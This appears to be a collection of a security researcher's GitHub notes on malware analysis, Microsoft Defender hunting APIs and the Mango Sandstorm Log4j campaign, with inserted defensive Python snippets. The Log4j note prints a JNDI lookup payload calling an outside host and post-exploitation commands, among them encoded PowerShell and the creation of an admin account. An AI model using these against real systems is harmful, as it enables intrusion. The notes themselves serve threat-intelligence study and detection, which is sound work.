30 | > [Understanding detection technology in the email entity page of Microsoft Defender for Office 365](https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/step-by-step-guides/understand-detection-technology-in-email-entity?view=o365-worldwide)
31 |
32 | Next, the Attachments tab of the Email Entity page shows detailed information about the attachment: Verdict, Hash/File IoC, Size, Analysis time, and more.
33 | From there you can also open 'Deep Analysis', which shows how the HTML file rendered when it was opened in the sandbox, including captured UI snapshots.
34 |
35 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/bcb2ece6-7754-49b1-bf3f-2f82b3e49182)
36 |
37 | Scrolling down the Deep Analysis page, you will find a list of all URLs, IPs, and hashes observed for the attachment.
38 | Not every observable is flagged as suspicious. As with the Deep Analysis feature in MDE, the file is treated as potentially suspicious from the start and detonated, so the collected observables show how the file behaves even before any single indicator is judged malicious.
39 |
40 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49fbf701-f984-413f-a306-e50e9523f22c)
41 |
42 | #### Disclaimer
43 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
44 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day01-Basic-Malware-Analysis.md:
--------------------------------------------------------------------------------
1 | # Day 1 - Malware Analysis
2 | Malware analysis is the process of examining malicious software, also known as malware, to understand how it works and how it can be detected and prevented.
While I haven't delved into deeper aspects of malware analysis such as reverse engineering, I have had the opportunity to explore basic malware analysis. I hope that sharing my logs will help someone who wants to take their first steps into malware analysis. 3 | 4 | Basic malware analysis consists of both static and dynamic analysis, as I highlighted in the red line below: 5 | ![image](https://user-images.githubusercontent.com/120234772/209261305-942e1796-f96d-403f-b151-0d4083d80bdb.png) 6 |
7 | > How You Can Start Learning Malware Analysis | SANS Institute! 8 | 9 | # Reference 10 | ■ [How You Can Start Learning Malware Analysis | SANS Institute!](https://www.sans.org/blog/how-you-can-start-learning-malware-analysis/)
11 | ■ [Practical Malware Analysis Essentials for Incident Responders](https://www.youtube.com/watch?v=20xYpxe8mBg&feature=emb_title)
12 |
13 |
14 | # Analysis Tips
15 | There are several points which analysts need to investigate during malware analysis. Here are some tips which are highly effective for the analysis.
16 |
17 | | Static Analysis | Comment/Memo |
18 | | :------------- | ------------- |
19 | | File Type | Check the magic number. "MZ" at offset 0 marks a DOS/PE header, which .exe, .dll and .sys files all share; the `PE\0\0` signature at the offset stored at 0x3C (e_lfanew) confirms a PE. Do not trust the file extension. |
20 | | Packers | Check for packers. Attackers use UPX, MEW and similar tools to compress and obfuscate the PE; telltale signs are section names such as UPX0/UPX1, very high section entropy, and an import table with only a handful of functions (e.g. LoadLibraryA and GetProcAddress). |
21 | | Timestamps | Check when the PE file was compiled (TimeDateStamp in the COFF header). The value is attacker-controllable, so treat an implausible date as a finding in itself rather than as truth. |
22 | | Hash value | MD5, SHA1, SHA256. Use them to register IoCs, pivot on threat intelligence, and hunt; remember that a hash matches only the identical file, so a repacked sample has a different hash. |
23 | | Dll (Libraries) | The imported DLLs show which subsystems the PE touches, e.g. wininet.dll or winhttp.dll for HTTP, ws2_32.dll for raw sockets, advapi32.dll for registry and services, crypt32.dll for cryptography. |
24 | | Function (Imports / Exports) | The imported functions show concrete capabilities, e.g. VirtualAllocEx, WriteProcessMemory and CreateRemoteThread for injection, RegSetValueEx for persistence, InternetOpenUrl for download; exports matter for DLLs and for rundll32-style execution. |
25 | | Strings | Find hints for understanding the PE file such as IPs, URLs, paths, DLL names, function names and so on. Run the strings extraction on the unpacked sample, since a packer hides them. |
26 |
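As an added example (my own code, not part of the original note and not a replacement for pestudio or floss), the static checks in the table above carried out on a PE image: magic number and PE signature, compile timestamp, section names that hint at a packer, hashes, and printable strings with URLs pulled out. The sample bytes are constructed inline as a synthetic, non-executable PE skeleton with UPX-style section names and a made-up URL, so it runs without a real sample; the packer section-name list and the string length threshold are my assumptions.

```python
# Added example (not code from the original note): minimal static PE triage
# over a constructed, non-executable PE skeleton.
import hashlib
import re
import struct
from datetime import datetime, timezone

# Section names commonly left behind by packers (UPX, MEW, ASPack, Petite, Themida, VMProtect); assumption.
PACKER_SECTION_HINTS = {"UPX0", "UPX1", "UPX2", ".MEW", "MEW", ".aspack", ".petite", ".themida", ".vmp0", ".vmp1"}
COFF_HEADER = "<HHIIIHH"   # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
IMAGE_FILE_DLL = 0x2000

def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Printable ASCII runs of at least min_len characters (what the strings tool prints)."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def triage(data: bytes) -> dict:
    """Static checks that need no disassembler. Stops early if the file is not a PE."""
    report = {"size": len(data), "md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}
    report["is_mz"] = data[:2] == b"MZ" and len(data) >= 0x40
    if not report["is_mz"]:
        return report
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of the PE header
    report["pe_signature_ok"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    if not report["pe_signature_ok"]:
        return report
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(COFF_HEADER, data, e_lfanew + 4)
    report["machine"] = hex(machine)                              # 0x14c = i386, 0x8664 = x64
    report["is_dll"] = bool(chars & IMAGE_FILE_DLL)
    report["compile_time_utc"] = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()  # attacker-controllable
    sec_table = e_lfanew + 4 + struct.calcsize(COFF_HEADER) + opt_size
    names = []
    for i in range(nsec):                                         # IMAGE_SECTION_HEADER is 40 bytes, name is the first 8
        raw = data[sec_table + 40 * i: sec_table + 40 * i + 8]
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    report["sections"] = names
    report["packer_hint"] = any(n in PACKER_SECTION_HINTS for n in names)
    report["strings"] = extract_strings(data)
    report["urls"] = [s for s in report["strings"] if re.match(r"https?://", s)]
    return report

def build_sample_pe() -> bytes:
    """Constructed sample: DOS header, PE signature, COFF header with two UPX-style
    sections and no optional header, followed by a few strings. Not executable."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)   # e_lfanew lives at offset 0x3C
    dos += b"\x00" * (e_lfanew - len(dos))
    ts = 1684886400                                               # 2023-05-24T00:00:00Z (made up)
    coff = struct.pack(COFF_HEADER, 0x14C, 2, ts, 0, 0, 0, 0x010F)
    sections = b"".join(name.ljust(8, b"\x00") + b"\x00" * 32 for name in (b"UPX0", b"UPX1"))
    body = (b"\x00" * 16 + b"http://203.0.113.10/update.php\x00"
            + b"C:\\Users\\Public\\svchost.exe\x00" + b"LoadLibraryA\x00" + b"\x01\x02\x03")
    return dos + b"PE\x00\x00" + coff + sections + body

if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key:18} {value}")
```

On a real sample, `triage(open(path, "rb").read())` gives the same fields; a packer hint plus an almost empty import table is the cue to unpack before reading the strings, and a compile time in the future or before the library versions it imports is itself worth noting in the report.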
27 |
28 | | Dynamic Analysis | Comment |
29 | | :------------- | ------------- |
30 | | Network indicator | The strings found during static analysis give clues about network activity. Confirm them by capturing traffic with Wireshark: filter on **HTTP (80), DNS (53)** or on URL keywords, and note any destination the sample contacts that the strings did not reveal. |
31 | | Host indicator | Static analysis also yields host clues: **PE file, process, command, path and so on.** These are valuable keys in dynamic analysis: build a timeline of the PE file's activity, map the process tree it creates, step through its actions by suspending and resuming the process, and compare registry keys before and after execution. |
32 |
33 | # Analysis Tools
34 | During basic static/dynamic malware analysis, I usually use these tools and websites:
35 | ### Static Analysis 36 | ■ Pestudio (https://www.winitor.com/download)
37 | ■ VirusTotal (https://www.virustotal.com/gui/home/upload)
38 | ■ floss (https://github.com/mandiant/flare-floss)
39 | ■ MalAPI.io (https://malapi.io/) 40 | 41 | ### Dynamic Analysis 42 | ■ Wireshark (https://www.wireshark.org/download.html)
43 | ■ TCPView (https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview)
44 | ■ Process Monitor (https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)
45 | ■ Process Explorer (https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer)
46 | ■ Process Hacker (https://processhacker.sourceforge.io/)
47 | ■ regshot (https://sourceforge.net/projects/regshot/) 48 | 49 | 50 | # Malware Sample 51 | ■ [theZoo - A Live Malware Repository](https://github.com/ytisf/theZoo) 52 | 53 | #### Disclaimer 54 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 55 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day17-Hunting-APIcalls-insight.md: -------------------------------------------------------------------------------- 1 | # Advanced Hunting - API calls insight 2 | APIs are highly valuable for security operations, and nowadays, we are increasingly transitioning towards more SOAR solutions. 3 | These solutions facilitate incident management, response to impacted assets, and report generation using APIs. 4 | 5 | At first, I really love this blog, discussing how we can effectively use MDE API calls to tag devices - [How to use tagging effectively (Part 3) - Scripting tags](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-3-scripting-tags/ba-p/1964073) 6 | 7 | Today, I'd like to share insights and address confusion regarding the use of hunting-related API calls based on my past testing experiences. 8 | 9 | ### First discovery ... many APIs.... 10 | As far as I know, originally there were MDE APIs for advanced hunting. 11 | However, after XDR was introduced to Microsoft Security, known as "Microsoft Threat Protection -> Microsoft 365 Defender, ***Nowadays, we call it - Microsoft Defender XDR***", we started using Advanced Hunting APIs. 12 | Now, there is a shift towards using Microsoft Graph security API instead of Advanced Hunting API. 13 | 14 | As you can see in [the Microsoft documentation](https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting), it states that the Advanced Hunting API is the old version, and it is recommended to use Microsoft Graph security API instead. 
15 | 16 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/69a29672-a6a0-457e-ac91-c6ed25a1a15d) 17 | 18 | When we consider the API history, it appears as follows: 19 | 20 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b0c876a5-9397-4582-954e-9e43bd2a4316) 21 | 22 | ### Second discovery ... different permissions 23 | Now that we have discussed three different advanced hunting-related APIs, determining the appropriate API permissions can be confusing. 24 | As I've listed three different APIs, each requires different permissions. 25 | Therefore, depending on which API you're using ***(Microsoft Graph security API is recommended)***, you'll need to assign the appropriate permissions. 26 | 27 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/56163135-65a9-4f89-b6f2-57fe1919b865) 28 | 29 | This is the actual PowerShell script demonstrating the use of the Advanced Hunting API; I often notice mistakes caused by incorrect API URLs. 30 | I've added three different API URLs for comparison purposes. 31 | - Code 34 - Microsoft Defender for Endpoint Advanced Hunting API 32 | - Code 37 - Microsoft Defender XDR Advanced Hunting API 33 | 34 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b2a18128-5261-4bb8-8d6e-8dd1ea93f871) 35 | 36 | - Code 44 - Microsoft Graph security API 37 | 38 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d1ef4746-8096-4dbb-b550-78ce61e4ea8c) 39 | 40 | ### Simulation 41 | As the Advanced Hunting API shifts to Microsoft Graph Security API, I've written a PowerShell script that uses Microsoft Graph Security API to perform advanced hunting and tags devices with Microsoft Defender for Endpoint API calls.
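The two mistakes the note describes (wrong API URL, wrong permission) can be caught before the call is made. The following Python is an added example, not the note's MDE-APIcallSimu.ps1: it keeps the three endpoints, token scopes and application permission names side by side as published in Microsoft's documentation (assumption: verify them against the current docs), checks the token's `aud` and `roles`/`scp` claims locally, and normalises the differently cased result fields of the three APIs. The unsigned token is constructed for the offline demonstration only.

```python
"""Request builder and local token checks for the three advanced hunting APIs."""
import base64
import json
import urllib.request
from dataclasses import dataclass


@dataclass(frozen=True)
class HuntingApi:
    name: str
    scope: str              # scope to request from Entra ID (client-credentials flow)
    endpoint: str           # POST endpoint that runs a KQL query
    app_permission: str     # application permission the app registration needs
    audiences: tuple        # acceptable `aud` claim values in the access token


HUNTING_APIS = {
    "mde": HuntingApi(
        "Microsoft Defender for Endpoint Advanced Hunting API",
        "https://api.securitycenter.microsoft.com/.default",
        "https://api.securitycenter.microsoft.com/api/advancedqueries/run",
        "AdvancedQuery.Read.All",
        ("https://api.securitycenter.microsoft.com",),
    ),
    "xdr": HuntingApi(
        "Microsoft Defender XDR Advanced Hunting API (older)",
        "https://api.security.microsoft.com/.default",
        "https://api.security.microsoft.com/api/advancedhunting/run",
        "AdvancedHunting.Read.All",
        ("https://api.security.microsoft.com",),
    ),
    "graph": HuntingApi(
        "Microsoft Graph security API (recommended)",
        "https://graph.microsoft.com/.default",
        "https://graph.microsoft.com/v1.0/security/runHuntingQuery",
        "ThreatHunting.Read.All",
        ("https://graph.microsoft.com", "00000003-0000-0000-c000-000000000000"),
    ),
}


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def token_claims(token: str) -> dict:
    """Decode the JWT payload WITHOUT verifying it; only for local troubleshooting."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def audience_matches(token: str, api_key: str) -> bool:
    """A token minted for one resource is rejected by another; check `aud` before calling."""
    return token_claims(token).get("aud") in HUNTING_APIS[api_key].audiences


def has_permission(token: str, api_key: str) -> bool:
    """App tokens carry permissions in `roles`, delegated tokens in the space-separated `scp`.
    Delegated scope names can differ; this checks the application permission name only."""
    claims = token_claims(token)
    granted = set(claims.get("roles", [])) | set(claims.get("scp", "").split())
    return HUNTING_APIS[api_key].app_permission in granted


def build_hunting_request(api_key: str, query: str, token: str) -> urllib.request.Request:
    """All three APIs accept a POST with a JSON body whose field is `Query`."""
    api = HUNTING_APIS[api_key]
    body = json.dumps({"Query": query}).encode()
    headers = {"Authorization": f"Bearer {token}",
               "Content-Type": "application/json",
               "Accept": "application/json"}
    return urllib.request.Request(api.endpoint, data=body, headers=headers, method="POST")


def extract_results(payload: dict) -> list:
    """Normalise the response: MDE/XDR return `Results`, Graph returns `results`."""
    for key in ("results", "Results"):
        if key in payload:
            return payload[key]
    raise ValueError(f"no results in response: {list(payload)}")


def run_hunting_query(api_key: str, query: str, token: str, timeout: int = 60) -> list:
    """Send the query (network call) once the two local checks pass."""
    api = HUNTING_APIS[api_key]
    if not audience_matches(token, api_key):
        raise ValueError(f"token audience does not match {api.name}; request scope {api.scope}")
    if not has_permission(token, api_key):
        raise ValueError(f"token lacks {api.app_permission} for {api.name}")
    req = build_hunting_request(api_key, query, token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_results(json.load(resp))


def make_unsigned_token(claims: dict) -> str:
    """Constructed, unsigned JWT used only to exercise the claim checks offline."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


if __name__ == "__main__":
    demo = make_unsigned_token({"aud": "https://graph.microsoft.com", "roles": ["ThreatHunting.Read.All"]})
    for key in HUNTING_APIS:
        print(key, build_hunting_request(key, "DeviceInfo | take 1", demo).full_url,
              "audience ok:", audience_matches(demo, key), "permission ok:", has_permission(demo, key))
```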
42 | 43 | - [x] [MDE-APIcallSimu.ps1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/MDE-APIcallSimu.ps1) is available from Security Research notes. 44 | 45 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4c746d54-bc96-46b5-9055-e350f2d24463) 46 | > Simulation : MDE-APIcallSimu.ps1 47 | 48 | ## Reference 49 | 1. [How to use tagging effectively (Part 3) - Scripting tags](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-3-scripting-tags/ba-p/1964073) 50 | 2. [The new Microsoft 365 Defender APIs in Microsoft Graph are now available in public preview!](https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/the-new-microsoft-365-defender-apis-in-microsoft-graph-are-now/ba-p/3603099) 51 | 52 | #### Disclaimer 53 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 54 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Attack techniques & insights 2 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 
3 | 4 | |#|Title|About| 5 | |:---|:---|:---| 6 | | Part 1 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part1-Overview.md) | Mango Sandstorm overview | 7 | | Part 2 | Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md |August 25, 2022, Mango Sandstorm | 8 | | Part 3 | [Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) |April 7, 2023, Mango Sandstorm & Storm-1084 | 9 | 10 | ## August 25, 2022, Mango Sandstorm 11 | #### Short Summary 12 | Mango Sandstorm, previously known for using Log4j 2 exploits to attack VMware apps, has recently been targeting SysAid apps using the same technique. Once they gain initial access, the group establishes persistence, moves laterally within the network using custom and well-known hacking tools, and dumps credentials. 13 | 14 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f67bb7ac-2cc3-4a6e-ab31-06b8db9ce991) 15 | > [!Note] 16 | > [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 17 | 18 | 19 | ## Log4j 2 vulnerability 20 | As the Mango Sandstorm attack was initiated through the Log4j vulnerability, let's delve deeper into the attack and the vulnerability. 21 | 22 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49b682a4-10a9-4b9b-be53-a0c80e00d01b) 23 | > [Remediating the Log4j vulnerability](https://www.youtube.com/watch?v=ulOTK2pZLNU) | Microsoft Defender for Endpoint 24 | 25 | #### What is Log4j? 
26 | Log4j is a widely used Java logging library that allows developers to log events and messages in their applications. It provides flexibility in categorizing and controlling logging output, enabling effective debugging and monitoring of applications. 27 | 28 | #### Why was Log4j 2 exploited? 29 | Log4j 2, an updated version of Log4j, is a widely used and powerful logging framework in Java. However, it had a critical vulnerability called Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832), ***which allowed attackers to remotely execute code by exploiting its deserialization functionality.*** 30 | 31 | #### How does the attacker precisely exploit the vulnerable Log4j 2? 32 | Attackers exploit vulnerable Log4j 2 systems by sending data containing a specific string. Log4j 2, while attempting to process this string, accesses ***a specified URL through the JNDI Lookup feature***. This allows attackers to download and execute malicious Java code within the system. 33 | > [!Note] 34 | > Java Naming and Directory Interface (JNDI)
35 | > It is a Java API that helps applications find and access data and resources using names. 36 | 37 | #### A specified URL? 38 | Here is the pattern of attack - **${jndi:ldap://[attacker site]/a}** 39 | 40 | e.g. 41 | ``` 42 | ${jndi:http://learningkijo.com/sub} 43 | ``` 44 | 45 | #### What commands were executed through the Log4j 2 exploit? 46 | ```cmd 47 | cmd.exe /C whoami 48 | cmd.exe /C powershell -exec bypass -w 1 -enc UwB…. 49 | cmd.exe /C hostname 50 | cmd.exe /C ipconfig /all 51 | cmd.exe /C net user 52 | cmd.exe /C net localgroup administrators 53 | cmd.exe /C net user admin * /add 54 | cmd.exe /C net localgroup Administrators admin /add 55 | cmd.exe /C quser 56 | ``` 57 | ## Reference 58 | 1. [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](https://www.microsoft.com/en-us/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/) 59 | 2. [Log4j (CVE-2021-44228) RCE Vulnerability Explained](https://www.youtube.com/watch?v=0-abhd-CLwQ) 60 | 61 | #### Disclaimer 62 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 63 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part2.md: -------------------------------------------------------------------------------- 1 | # Day 11 - XDR insights - File Analysis <1/2> 2 | In the previous blog, we explored fundamental malware analysis using Microsoft 365 Defender. Thanks to Microsoft 365 Defender, we obtained essential insights into the malware file and accurately identified its type. Ultimately, we revealed the malware's dropped files and IPs by leveraging deep analysis. 3 | 4 | Now, I'm excited to cover a much deeper exploration of deep analysis and PE analysis, leveraging the capabilities of third-party tools.
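Returning to the Log4j 2 section of the Day 4 Part 2 note above: the following Python is an added example, not from the original note, showing how a defender can spot the `${jndi:...}` lookup string in web access logs and flag the follow-on shell commands listed there when they are spawned by a Java process. The log lines and process events are constructed; the lookup normalisation goes slightly beyond the note's single pattern by also unwrapping nested `${lower:}`, `${upper:}` and `${:-}` lookups that hide the literal `jndi`.

```python
"""Detect Log4Shell-style JNDI lookup strings in web logs and the follow-on command pattern."""
import re

# Log4j 2 lookups can be nested to hide the literal "jndi"; resolve the common forms first.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# After normalisation, capture the scheme and host(:port) of the JNDI reference.
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+):/*([^/\s}]+)", re.IGNORECASE)


def normalise_lookups(text: str) -> str:
    """Repeatedly unwrap ${lower:x}, ${upper:x} and ${...:-x} until nothing changes."""
    while True:
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new


def find_jndi_lookups(log_lines) -> list:
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = _JNDI.search(normalise_lookups(line))
        if match:
            findings.append({"line": line_no, "scheme": match.group(1).lower(),
                             "host": match.group(2), "raw": line.strip()})
    return findings


# Post-exploitation commands from the note above, as a watchlist for children of Java processes.
SUSPICIOUS_CMD = (
    re.compile(r"\bwhoami\b", re.I),
    re.compile(r"\bnet\s+user\b.*\s/add\b", re.I),
    re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I),
    re.compile(r"\bpowershell\b.*\s-e(nc|ncodedcommand)?\s", re.I),
    re.compile(r"\b(hostname|ipconfig|quser)\b", re.I),
)


def flag_java_children(process_events) -> list:
    """Flag shells spawned by a Java/Tomcat process whose command line matches the watchlist."""
    flagged = []
    for event in process_events:
        parent = event["parent"].lower()
        if not any(tag in parent for tag in ("java", "tomcat")):
            continue
        if any(pattern.search(event["cmdline"]) for pattern in SUSPICIOUS_CMD):
            flagged.append(event)
    return flagged


# Constructed sample data (RFC 5737 addresses); the second line is the plain pattern from the note,
# the third and fourth use nested lookups to hide "jndi".
SAMPLE_LOG = [
    '192.0.2.7 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [11/Dec/2021:10:01:05 +0000] "GET /api/login HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '192.0.2.9 - - [11/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.9 - - [11/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 5 "-" "${${::-j}ndi:rmi://203.0.113.9/y}"',
]
SAMPLE_PROCESS_EVENTS = [
    {"parent": "java.exe", "cmdline": "cmd.exe /C whoami"},
    {"parent": "java.exe", "cmdline": "cmd.exe /C net user admin * /add"},
    {"parent": "explorer.exe", "cmdline": "cmd.exe /C whoami"},   # not a Java child: ignored
    {"parent": "java.exe", "cmdline": "cmd.exe /C dir C:\\logs"},  # benign child: ignored
]


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['host']}")
    for event in flag_java_children(SAMPLE_PROCESS_EVENTS):
        print("suspicious child of", event["parent"], ":", event["cmdline"])
```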
5 | 6 | > [!Note] 7 | > If you missed the chance to read Malware Analysis Part 1, here is [Day11-MalwareAnalysis-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md). 8 | 9 | ## Deep analysis in MDE 10 | After [deep analysis](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-file-alerts?view=o365-worldwide#deep-analysis) unpacked the PE file in a cloud-based sandbox environment in MDE and provided a comprehensive report, I highlighted suspicious activities from the results. 11 | Concerning Command and Control (C2C), we can observe that the Type A malware [supr.exe] attempts to access an external IP [40.9.74.80] via an HTTP request. 12 | While [13.107.4.50] appears to be a legitimate access point, it was flagged in VirusTotal. This suggests that the IP might be used as a legitimate remote access tool. 13 | 14 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ea8eb0ac-ac05-4e9a-901d-464e6c78e830) 15 | 16 | In terms of persistence, Type A [supr.exe] can create [oneet.exe] and set up a scheduled task to run [oneet.exe] every minute. 17 | Additionally, [oneet.exe] initiates [cmd.exe] to control access to specific files and directories. 18 | 19 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8ecbdf02-7e61-48a2-b939-d25cffc6ec9b) 20 | 21 | 22 | ## ANY.RUN ? 23 | Any.Run is a tool that helps cybersecurity experts and researchers safely test and study malicious software (malware). 24 | It lets them see what the malware does without harming real computers. 25 | They can upload suspicious files or links, and Any.Run shows how the malware behaves in a safe environment, helping experts learn how to protect against it.
26 | 27 | Thanks to [Any.Run](https://app.any.run/tasks/7ad0e3c5-1617-437f-8cbb-700e40026cee/) and the Deep Analysis results, we can clearly see and understand how Type A [supr.exe] behaves during runtime. 28 | While we might have already gathered some insights from the Deep Analysis, Any.Run helps us visualize the logic of malware activities, such as the process tree. 29 | It allows us to sync each process with the process tree, especially in the case of C2C activities. 30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1cda860c-8263-480a-8fbb-4c1747404d1d) 32 | > ANY.RUN - Type A [supr.exe] process tree 33 | 34 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8a68527d-346d-42fa-a09b-518b7e9b25aa) 35 | > ANY.RUN - C2C activities 36 | 37 | ## Pestudio ? 38 | [Pestudio](https://www.winitor.com/download) is a software tool used for analyzing and inspecting executable files (programs). 39 | It provides information about these files, including details about their structure, imported and exported functions, embedded strings, and resources, among other aspects. In the cybersecurity field, Pestudio is utilized for static analysis, examining PE files without executing them. 40 | 41 | 42 | Based on PeStudio output, it appears that obfuscation techniques were used in the PE file. 43 | This includes the presence of a base64 string and the use of some suspicious APIs such as [MemoryStream](https://learn.microsoft.com/en-us/dotnet/api/system.io.memorystream?view=net-7.0) and [CheckRemoteDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-checkremotedebuggerpresent). 44 | 45 | Through Pestudio, I managed to gather insights about the content within the PE file that might not have been fully covered by MDE. 46 | While I didn't delve into every detail, the static analysis of PE file revealed signs of obfuscation and other interesting elements. 
47 | 48 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3eaac226-4a09-4535-aa69-116d771eafb4) 49 | > Pestudio - Suspicious values from strings 50 | 51 | #### Disclaimer 52 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 53 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part1-Overview.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Overview 2 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 3 | 4 | |#|Title|About| 5 | |:---|:---|:---| 6 | | Part 1 | Day4-Mango-Sandstorm-Part1-Overview.md | Mango Sandstorm overview | 7 | | Part 2 | [Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md) |August 25, 2022, Mango Sandstorm | 8 | | Part 3 | [Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) |April 7, 2023, Mango Sandstorm & Storm-1084 | 9 | 10 | ## What is Mango Sandstorm ? 11 | Mango Sandstorm, formerly known as MERCURY, is ***an Iranian-based cyber activity group*** that specializes in sensitive data gathering through advanced cyber attacks, rather than financial gain. Their attack techniques include spear-phishing attacks, exploiting vulnerabilities, malware and social engineering. 12 | 13 | For more detailed insight, Microsoft Defender Threat Intelligence also covers Mango Sandstorm's description, TTPs, and IOCs.
